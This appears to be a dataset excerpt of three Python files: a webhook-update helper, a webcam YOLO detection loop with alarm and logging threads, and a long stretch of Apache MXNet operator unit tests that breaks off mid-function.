source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
helpers.py
|
import functools
import threading
import logging
import requests
import datetime
from requests.models import HTTPBasicAuth
logger = logging.getLogger(__name__)
def thread_it(func):
"""A wrapper function to run func in a daemon thread.
Args:
func (function): The function to run in a thread
Returns:
function: the wrapped function.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread #returning to support unit testing
return wrapper
def send_update(category, message, update_service_data):
"""Sends message (application updates) to an http endpoint
"""
if not update_service_data:
logger.warning(
"updateCallback in instruction is not configured properly. Request not sent to update webhook"
)
return
data = {"time": datetime.datetime.now(), "category": category, "message": message}
url = update_service_data.get('url', "")
custom_headers = update_service_data.get('customHeaders', {})
username = update_service_data.get('username', "")
password = update_service_data.get('password', "")
try:
if username:
requests.post(url,
data=data,
headers=custom_headers,
auth=HTTPBasicAuth(username, password))
else:
requests.post(url, data=data, headers=custom_headers)
except Exception as e:
logger.error(e)
|
camera.py
|
import time
import threading
import cv2
import numpy as np
from PIL import Image
from yolo import YOLO
from tools.alarm import alarm
from tools.save_csv import save_record
from tools.client import client
if __name__ == "__main__":
"""
這是用來捕捉攝影機畫面並將畫面送進模型預測的程式
"""
yolo = YOLO()
cnt_x = 0
client_cnt = 0
cap = cv2.VideoCapture(0)
start = time.time()
start_client = time.time()
while(cap.isOpened()):
ret, frame = cap.read()
if ret:
frame_pil = Image.fromarray(np.uint8(cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)))
frame, count_OX = yolo.detect_image(frame_pil)
frame = cv2.cvtColor(np.asarray(frame),cv2.COLOR_RGB2BGR)
cv2.imshow("Camera",frame)
if count_OX[0][1] >= 1:
cnt_x += 1
elif count_OX[0][1] == 0:
cnt_x = 0
if cnt_x >= 30:
cnt_x = 0
t = threading.Thread(target = alarm)
t.start()
client_cnt += 1
if (time.time() - start_client) >= 10.0:
print(time.time() - start_client)
if client_cnt >= 1:
t = threading.Thread(target = client)
t.start()
client_cnt = 0
start_client = time.time()
if (time.time() - start) >= 30.0:
t = threading.Thread(target = save_record, args = (count_OX,))
t.start()
start = time.time()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if grad_req != 'null':
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
else:
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
T, N, I, H = 5, 32, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
T, N, I, H = 5, 20, 800, 800
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
T, N, I, H = 5, 20, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
out1 = exec1.outputs[0].asnumpy()
exec1.forward(is_train=True)
out1 = exec1.outputs[0].asnumpy()
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a.asnumpy(), out_grad.asnumpy(), rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1.asnumpy(), ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad.asnumpy(), np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i].asnumpy(), gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i].asnumpy(), gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0].asnumpy(),
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0].asnumpy(), np_out, atol=atol)
assert_almost_equal(grad_map["data"].asnumpy(), out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad.asnumpy(), np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x.asnumpy(), exec1.outputs[0].asnumpy())
exec1.backward(dy)
assert_almost_equal(dy.asnumpy(), dx.asnumpy())
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0].asnumpy()
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
